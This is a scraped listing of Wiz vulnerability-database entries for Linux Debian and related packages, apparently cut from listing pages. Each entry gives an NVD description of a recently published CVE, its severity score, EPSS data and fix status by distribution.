Debian 14 Has Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized vi
Wiz
CVE-2026-2889 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-2889 [MEDIUM] CVE-2026-2889 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2889 :
Linux Debian vulnerability analysis and mitigation
A vulnerability was detected in CCExtractor up to 0.96.5. Affected is the function processmp4 in the library src/lib_ccx/mp4.c. Performing a manipulation results in use after free. The attack is only possible with local access. The exploit is now public and may be used. Upgrading to version 0.96.6 is able to address this issue. The patch is named fd7271bae238ccb3ae8a71304ea64f0886324925. You should upgrade the affected component.
Source : NVD
## 4.8
Score
Published February 21, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.5
Exploitation Prob
Wiz
CVE-2022-50713 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50713 [MEDIUM] CVE-2022-50713 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50713 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
clk: visconti: Fix memory leak in visconti_register_pll()
@pll->rate_table has allocated memory by kmemdup(), if clk_hw_register()
fails, it should be freed, otherwise it will cause memory leak issue,
this patch fixes it.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
linux-aws-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 26, 2025
Echo Has Fix Added at:
Wiz
CVE-2025-67749 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-67749 [MEDIUM] CVE-2025-67749 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67749 :
Linux Debian vulnerability analysis and mitigation
PCSX2 is a free and open-source PlayStation 2 (PS2) emulator. In versions 2.5.377 and below, an unchecked offset and size used in a memcpy operation inside PCSX2's CDVD SCMD 0x91 and SCMD 0x8F handlers allow a specially crafted disc image or ELF to cause an out-of-bounds read from emulator memory. Because the offset and size is controlled through MG header fields, a specially crafted ELF can read data beyond the bounds of mg_buffer and have it reflected back into emulated memory. This issue is fixed in version 2.5.378.
Source : NVD
## 5.3
Score
Published December 12, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release D
Wiz
CVE-2026-23027 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23027 [MEDIUM] CVE-2026-23027 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23027 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
LoongArch: KVM: Fix kvm_device leak in kvm_pch_pic_destroy()
In kvm_ioctl_create_device(), kvm_device has allocated memory,
kvm_device->destroy() seems to be supposed to free its kvm_device
struct, but kvm_pch_pic_destroy() is not currently doing this, that
would lead to a memory leak.
So, fix it.
Source : NVD
Published January 31, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-gcp-6.8
linux-gkeop
Sour
Wiz
CVE-2025-68220 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2025-68220 CVE-2025-68220 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68220 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: ethernet: ti: netcp: Standardize knav_dma_open_channel to return NULL on error
Make knav_dma_open_channel consistently return NULL on error instead
of ERR_PTR. Currently the header include/linux/soc/ti/knav_dma.h
returns NULL when the driver is disabled, but the driver
implementation does not even return NULL or ERR_PTR on failure,
causing inconsistency in the users. This results in a crash in
netcp_free_navigator_resources as followed (trimmed):
Unhandled fault: alignment exception (0x221) at 0xfffffff2
[fffffff2] *pgd=80000800207003, *pmd=82ffda003, *pte=00000000
Internal error: : 221 [#1] SMP ARM
Modules linked in:
CPU: 0 UID: 0 PID: 1 Comm
Wiz
CVE-2026-23427 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23427 CVE-2026-23427 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23427 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix use-after-free in durable v2 replay of active file handles
parse_durable_handle_context() unconditionally assigns dh_info->fp->conn
to the current connection when handling a DURABLE_REQ_V2 context with
SMB2_FLAGS_REPLAY_OPERATION. ksmbd_lookup_fd_cguid() does not filter by
fp->conn, so it returns file handles that are already actively connected.
The unconditional overwrite replaces fp->conn, and when the overwriting
connection is subsequently freed, __ksmbd_close_fd() dereferences the
stale fp->conn via spin_lock(&fp->conn->llist_lock), causing a
use-after-free.
KASAN report:
[ 7.349357] =================================================
Wiz
CVE-2026-32953 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.7
CVE-2026-32953 [MEDIUM] CVE-2026-32953 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32953 :
Linux Debian vulnerability analysis and mitigation
Tillitis TKey Client package is a Go package for a TKey client. Versions 1.2.0 and below contain a critical bug in the tkeyclient Go module which causes 1 out of every 256 User Supplied Secrets (USS) to be silently ignored, producing the same Compound Device Identifier (CDI)—and thus the same key material—as if no USS is provided. This happens because a buffer index error overwrites the USS-enabled boolean with the first byte of the USS digest, so any USS whose hash starts with 0x00 is effectively discarded. This issue has been fixed in version 1.3.0. Users unable to upgrade immediately should switch to a USS whose hash does not begin with a zero byte.
Source : NVD
## 4.7
Score
Published March 20, 2026
Severity
Wiz
CVE-2026-23295 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23295 [MEDIUM] CVE-2026-23295 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23295 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
accel/amdxdna: Fix dead lock for suspend and resume
When an application issues a query IOCTL while auto suspend is running,
a deadlock can occur. The query path holds dev_lock and then calls
pm_runtime_resume_and_get(), which waits for the ongoing suspend to
complete. Meanwhile, the suspend callback attempts to acquire dev_lock
and blocks, resulting in a deadlock.
Fix this by releasing dev_lock before calling pm_runtime_resume_and_get()
and reacquiring it after the call completes. Also acquire dev_lock in the
resume callback to keep the locking consistent.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Wiz
CVE-2026-31410 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-31410 [MEDIUM] CVE-2026-31410 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31410 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: use volume UUID in FS_OBJECT_ID_INFORMATION
Use sb->s_uuid for a proper volume identifier as the primary choice.
For filesystems that do not provide a UUID, fall back to stfs.f_fsid
obtained from vfs_statfs().
Source : NVD
## 6.5
Score
Published April 6, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-fips
linux-azure-fips
Sources
NVD
Debian 11, 12, 13 No Fix Added at: A
Wiz
CVE-2026-28296 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-28296 [MEDIUM] CVE-2026-28296 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28296 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in the FTP GVfs backend. A remote attacker could exploit this input validation vulnerability by supplying specially crafted file paths containing carriage return and line feed (CRLF) sequences. These unsanitized sequences allow the attacker to terminate intended FTP commands and inject arbitrary FTP commands, potentially leading to arbitrary code execution or other severe impacts.
Source : NVD
## 4.3
Score
Published February 26, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.2
Exploitation Probability (EPSS) 0.1
Wiz
CVE-2020-37040 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.4
CVE-2020-37040 [HIGH] CVE-2020-37040 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2020-37040 :
Echo vulnerability analysis and mitigation
Code Blocks 17.12 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by crafting a malicious file name with Unicode characters. Attackers can trigger the vulnerability by pasting a specially crafted payload into the file name field during project creation, potentially executing system commands like calc.exe.
Source : NVD
## 8.4
Score
Published January 30, 2026
Severity HIGH
CNA Score 8.4
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
codeblocks
Sources
NVD
Echo Severity HIGH
Wiz
CVE-2025-40358 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-40358 [MEDIUM] CVE-2025-40358 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40358 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
riscv: stacktrace: Disable KASAN checks for non-current tasks
Unwinding the stack of a task other than current, KASAN would report
"BUG: KASAN: out-of-bounds in walk_stackframe+0x41c/0x460"
There is a same issue on x86 and has been resolved by the commit
84936118bdf3 ("x86/unwind: Disable KASAN checks for non-current tasks")
The solution could be applied to RISC-V too.
This patch also can solve the issue: https://seclists.org/oss-sec/2025/q4/23
[[email protected]: clean up checkpatch issues]
Source : NVD
Published December 16, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CI
Wiz
CVE-2025-14282 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2025-14282 [MEDIUM] CVE-2025-14282 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14282 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in Dropbear. When running in multi-user mode and authenticating users, the dropbear ssh server does the socket forwardings requested by the remote client as root,
only switching to the logged-in user upon spawning a shell or performing
some operations like reading the user's files.
With the recent ability of also using unix domain sockets as the forwarding destination any user able to log in via ssh can connect to any unix socket with the root's credentials, bypassing both file system restrictions and any SO_PEERCRED / SO_PASSCRED checks performed by the peer.
Source : NVD
## 5.4
Score
Published February 12, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
Linux Debian
Linux Alpine
Wiz
CVE-2026-32726 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-32726 [HIGH] CVE-2026-32726 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32726 :
Linux Debian vulnerability analysis and mitigation
SciTokens C++ is a minimal library for creating and using SciTokens from C or C++. Prior to version 1.4.1, scitokens-cpp is vulnerable to an authorization bypass in path-based scope validation. The enforcer used a simple string-prefix comparison when checking whether a requested resource path was covered by a token's authorized scope path. Because the check did not require a path-segment boundary, a token scoped to one path could incorrectly authorize access to sibling paths that merely started with the same prefix. This issue has been patched in version 1.4.1.
Source : NVD
## 8.1
Score
Published March 31, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has C
Wiz
CVE-2025-65865 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-65865 [HIGH] CVE-2025-65865 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-65865 :
Echo vulnerability analysis and mitigation
An integer overflow in eProsima Fast-DDS v3.3 allows attackers to cause a Denial of Service (DoS) via a crafted input.
Source : NVD
## 7.5
Score
Published December 23, 2025
Severity HIGH
CNA Score 7.5
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
fastdds
Sources
NVD
Echo Severity HIGH No Fix Added at: Dec 24, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Echo vulnerabilities:
CVE ID
Severity
Score
Te
Wiz
CVE-2026-24808 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
CVE-2026-24808 [HIGH] CVE-2026-24808 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24808 :
Linux Debian vulnerability analysis and mitigation
Integer Overflow or Wraparound vulnerability in RawTherapee (rtengine modules). This vulnerability is associated with program files dcraw.Cc.
This issue affects RawTherapee: through 5.11.
Source : NVD
## 8.3
Score
Published January 27, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
rawtherapee
Sources
NVD
Debian 11, 12, 13 Severity LOW No Fix Added at: Jan 28, 2026
Debian 14 Severity LOW Has Fix Added at: Jan 28, 2026
Echo No Fix Added at: Jan 28, 2026
## Get a
Wiz
CVE-2025-71240 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2025-71240 [MEDIUM] CVE-2025-71240 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71240 :
Linux Debian vulnerability analysis and mitigation
SPIP before 4.2.15 allows Cross-Site Scripting (XSS) via crafted content in HTML code tags. The application does not properly verify JavaScript within code tags, allowing an attacker to inject malicious scripts that execute in a victim's browser.
Source : NVD
## 4.8
Score
Published February 19, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
spip
Sources
NVD
Debian 11 Severity MEDIUM No Fix Added at: Feb 20, 2026
Debian 13, 14 Severity MEDIUM Has Fix Added at: Feb
Wiz
CVE-2026-22205 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-22205 [HIGH] CVE-2026-22205 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22205 :
Linux Debian vulnerability analysis and mitigation
SPIP versions prior to 4.4.10 contain an authentication bypass vulnerability caused by PHP type juggling that allows unauthenticated attackers to access protected information. Attackers can exploit loose type comparisons in authentication logic to bypass login verification and retrieve sensitive internal data.
Source : NVD
## 8.7
Score
Published February 26, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 59.8
Exploitation Probability (EPSS) 0.4
Affected packages and libraries
spip
Sources
NVD
Debian 11 Severity HIGH No Fix Added at: Mar
Wiz
CVE-2026-23174 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23174 [MEDIUM] CVE-2026-23174 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23174 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
nvme-pci: handle changing device dma map requirements
The initial state of dma_needs_unmap may be false, but change to true
while mapping the data iterator. Enabling swiotlb is one such case that
can change the result. The nvme driver needs to save the mapped dma
vectors to be unmapped later, so allocate as needed during iteration
rather than assume it was always allocated at the beginning. This fixes
a NULL dereference from accessing an uninitialized dma_vecs when the
device dma unmapping requirements change mid-iteration.
Source : NVD
Published February 14, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploi
Wiz
CVE-2025-0577 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2025-0577 [MEDIUM] CVE-2025-0577 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-0577 :
Linux Debian vulnerability analysis and mitigation
An insufficient entropy vulnerability was found in glibc. The getrandom and arc4random family of functions may return predictable randomness if these functions are called again after the fork, which happens concurrently with a call to any of these functions.
Source : NVD
## 4.8
Score
Published February 18, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
seal-glibc
Sources
NVD
Debian Severity MEDIUM Has Fix Added at: Jan 11, 2026
## Get a CVE risk assessment
Get a prio
Wiz
CVE-2006-10003 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2006-10003 [CRITICAL] CVE-2006-10003 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2006-10003 :
Linux Debian vulnerability analysis and mitigation
XML::Parser versions through 2.47 for Perl has an off-by-one heap buffer overflow in st_serial_stack.
In the case (stackptr == stacksize - 1), the stack will NOT be expanded. Then the new value will be written at location (++stackptr), which equals stacksize and therefore falls just outside the allocated buffer.
The bug can be observed when parsing an XML file with very deep element nesting
Source : NVD
## 9.8
Score
Published March 19, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22
Exploitation Probability (EPSS) 0.1
Affect
Wiz
CVE-2025-68369 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2025-68369 CVE-2025-68369 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68369 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ntfs3: init run lock for extend inode
After setting the inode mode of $Extend to a regular file, executing the
truncate system call will enter the do_truncate() routine, causing the
run_lock uninitialized error reported by syzbot.
Prior to patch 4e8011ffec79, if the inode mode of $Extend was not set to
a regular file, the do_truncate() routine would not be entered.
Add the run_lock initialization when loading $Extend.
syzbot reported:
INFO: trying to register non-static key.
Call Trace:
dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120
assign_lock_key+0x133/0x150 kernel/locking/lockdep.c:984
register_lock_class+0x105/0x320 kernel/locking/lockdep.c:
Wiz
CVE-2025-64736 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-64736 [MEDIUM] CVE-2025-64736 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-64736 :
Linux Debian vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the ABF parsing functionality of The Biosig Project libbiosig 3.9.2 and Master Branch (5462afb0). A specially crafted .abf file can lead to an information leak. An attacker can provide a malicious file to trigger this vulnerability.
Source : NVD
## 7.1
Score
Published March 3, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Mar 03, 2026
Echo Severity
Wiz
CVE-2026-2604 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-2604 [MEDIUM] CVE-2026-2604 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2604 :
Linux Debian vulnerability analysis and mitigation
insecure local cache file removal
Source : NVD
Published February 18, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
evolution-data-server
libebook-contacts-1_2-4
Sources
NVD
Debian 11, 14 Has Fix Added at: Feb 18, 2026
Debian 12, 13 No Fix Added at: Feb 18, 2026
Echo No Fix Added at: Feb 18, 2026
Red Hat 6, 7, 8, 9, 10 Severity MEDIUM No Fix Added at: Feb 17, 2026
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Mar 02, 2026
Ubuntu 22.04, 24.04, 25.10 Severity
Wiz
CVE-2026-23373 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23373 [MEDIUM] CVE-2026-23373 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23373 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
wifi: rsi: Don't default to -EOPNOTSUPP in rsi_mac80211_config
This triggers a WARN_ON in ieee80211_hw_conf_init and isn't the expected
behavior from the driver - other drivers default to 0 too.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-hwe-6.14
linux-oracle
Sources
NVD
Debian 13 No Fix Added at: Mar 26, 2026
Debian 14 Has Fix Added at: Mar 26, 2026
Ubuntu 24.04
Wiz
CVE-2026-3312 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-3312 [MEDIUM] CVE-2026-3312 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3312 :
Linux Debian vulnerability analysis and mitigation
.. include::
Source : NVD
Published March 13, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pagure
Sources
NVD
Debian 11 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 13 No Fix Added at: Mar 19, 2026
Echo No Fix Added at: Mar 19, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Linux Debian vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CIS
Wiz
CVE-2026-23184 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-23184 [HIGH] CVE-2026-23184 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23184 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
binder: fix UAF in binder_netlink_report()
Oneway transactions sent to frozen targets via binder_proc_transaction()
return a BR_TRANSACTION_PENDING_FROZEN error but they are still treated
as successful since the target is expected to thaw at some point. It is
then not safe to access 't' after BR_TRANSACTION_PENDING_FROZEN errors
as the transaction could have been consumed by the now thawed target.
This is the case for binder_netlink_report() which derreferences 't'
after a pending frozen error, as pointed out by the following KASAN
report:
BUG: KASAN: slab-use-after-free in binder_netlink_report.isra.0+0x694/0x6c8
Read of size 8 at addr ffff00000f
Wiz
CVE-2026-23431 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23431 [MEDIUM] CVE-2026-23431 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23431 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
spi: amlogic-spisg: Fix memory leak in aml_spisg_probe()
In aml_spisg_probe(), ctlr is allocated by
spi_alloc_target()/spi_alloc_host(), but fails to call
spi_controller_put() in several error paths. This leads
to a memory leak whenever the driver fails to probe after
the initial allocation.
Convert to use devm_spi_alloc_host()/devm_spi_alloc_target()
to fix the memory leak.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4
Exploitation Probability (EP
Wiz
CVE-2026-2219 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-2219 [HIGH] CVE-2026-2219 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2219 :
Linux Debian vulnerability analysis and mitigation
It was discovered that dpkg-deb (a component of dpkg, the Debian package management system) does not properly validate the end of the data stream when uncompressing a zstd-compressed .deb archive, which may result in denial of service (infinite loop spinning the CPU).
Source : NVD
## 7.5
Score
Published March 7, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
seal-dpkg
dpkg
Sources
NVD
Debian 12 Severity MEDIUM No Fix Added at: Mar 08, 2026
Debian 13, 14 Severity HI
Wiz
CVE-2025-67603 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2025-67603 [MEDIUM] CVE-2025-67603 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67603 :
Linux Debian vulnerability analysis and mitigation
A Improper Authorization vulnerability in Foomuuri llows arbitrary users to influence the firewall configuration.This issue affects Foomuuri: from ? before 0.31.
Source : NVD
## 5.1
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
foomuuri_exporter
foomuuri
Sources
NVD
Debian 13, 14 Has Fix Added at: Jan 08, 2026
Echo Has Fix Added at: Jan 08, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so y
Wiz
CVE-2025-67483 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-67483 [MEDIUM] CVE-2025-67483 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67483 :
Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files resources/src/mediawiki.Page.Preview.Js.
This issue affects MediaWiki: from * before 1.43.6, 1.44.3, 1.45.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12 No Fix Added at: Dec 12, 2025
Debian 13, 14 Has Fix
Wiz
CVE-2026-5314 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5314 [MEDIUM] CVE-2026-5314 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5314 :
Linux Debian vulnerability analysis and mitigation
A vulnerability was found in Nothings stb up to 1.26. Impacted is the function stbtt_InitFont_internal in the library stb_truetype.h of the component TTF File Handler. Performing a manipulation results in out-of-bounds read. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 5.3
Score
Published April 1, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.6
Exploitation Probability (EPSS) N/A
Af
Wiz
CVE-2020-37038 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.6
CVE-2020-37038 [MEDIUM] CVE-2020-37038 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2020-37038 :
Echo vulnerability analysis and mitigation
Code Blocks 20.03 contains a denial of service vulnerability that allows attackers to crash the application by manipulating input in the FSymbols search field. Attackers can paste a large payload of 5000 repeated characters into the search field to trigger an application crash.
Source : NVD
## 4.6
Score
Published January 30, 2026
Severity MEDIUM
CNA Score 4.6
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
codeblocks
Sources
NVD
Echo Severity HIGH No Fix Added at: Jan 31, 2026
## Get a CVE risk assessment
Get a priori
Wiz
